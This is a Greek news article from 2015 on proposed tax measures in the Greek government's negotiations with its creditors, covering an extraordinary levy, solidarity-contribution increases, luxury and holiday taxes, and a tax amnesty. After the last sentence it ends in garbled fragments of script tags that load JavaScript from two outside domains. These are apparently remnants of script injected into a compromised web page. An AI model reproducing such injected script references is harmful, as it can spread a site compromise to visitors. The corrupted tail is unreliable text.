Δύο σενάρια για αύξηση της έκτακτης εισφοράς το 2015

1

Σενάρια και προτάσεις για τα μέτρα του πολυνομοσχεδίου ώστε να ανοίξει ο δρόμος για συμφωνία…

Με το παζάρι Αθήνας – δανειστών να βρίσκεται στην πιο κρίσιμη φάση καθώς τα λεφτά και ο χρόνος τελειώνουν οι δύο πλευρές επεξεργάζονται τα μέτρα που θα περιέχει στην τελική του μορφή το πολυνομοσχέδιο, ώστε υπάρξει μια ενδιάμεση συμφωνία που θα ξεκλειδώσει τμήμα της δόσης προς την Αθήνα.

Τα σενάρια για την έκτακτη εισφορά

Στο τραπέζι, οπως αναφέρουν οι πληροφορίες, έχουν πέσει διάφορες προτασεις για την επιβολή έκτακτης εισφοράς. Μια από τις προτάσεις προβλέπει την επιβολή έκτακτης εισφοράς 1,5% σε 500 φορολογούμενους που δηλώνουν τα υψηλότερα εισοδήματα στην Εφορία. Στόχος να εισπραχθούν εως 200 εκ. Ευρώ από επιχειρήσεις και φυσικά πρόσωπα.

Για την εισφορά αλληλεγγύης σχεδιάζεται να αυξηθεί κατά 30% τουλάχιστον για εισοδηματα άνω των 30.000 ευρώ. Παίζει επίσης και σενάριο για αύξηση των συντελεστών κατά 50% για εισοδήματα άνω των 50.000 ευρώ.

Αλλα φορολογικά μέτρα που εξετάζονται

Φόροι διακοπών: Τέλος διανυκτέρευσης 3%-5% την ημερα σε πολυτελή ξενοδοχεία στα νησιά του Αιγαίου. Επισης 3% φόρος επί του τζίρου σε μπαρ και πολυτελή εστιατόρια τη θερινή περίοδο.

Φόροι πολυτελείας: 6% σε κοσμηματοπωλεία, ακριβά είδη ρουχισμού και έργα τέχνης. Αύξηση απο το 10% στο 13% του φόρου πολυτελούς διαβίωσης για ΙΧ μεγάλου κυβισμού, αλλά και για ακριβά ακίνητα και πισίνες.

Πληρωμές με κάρτες: Υποχρεωτικά για συναλλαγές πάνω από 70 ευρώ στα νησιά του Αιγαιου με 3.100 ή 4.100 κατοίκους.

Φορολογική αμνηστία: Με τίμημα 15%- 20% αμνηστεύονται τα αδήλωτα εισοδήματα.

Ηλεκτρονικός ΦΠΑ: Διαχωρισμός και προκαταβολή του ΦΠΑ τη στιγμή της είσπραξης από τις επιχειρησεις.

Μπόνους για τους συνεπείς φορολογούμενους που θα καταχωρίζουν τις αποδείξεις σε ηλεκτρονικό σύστημα καταγραφής.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >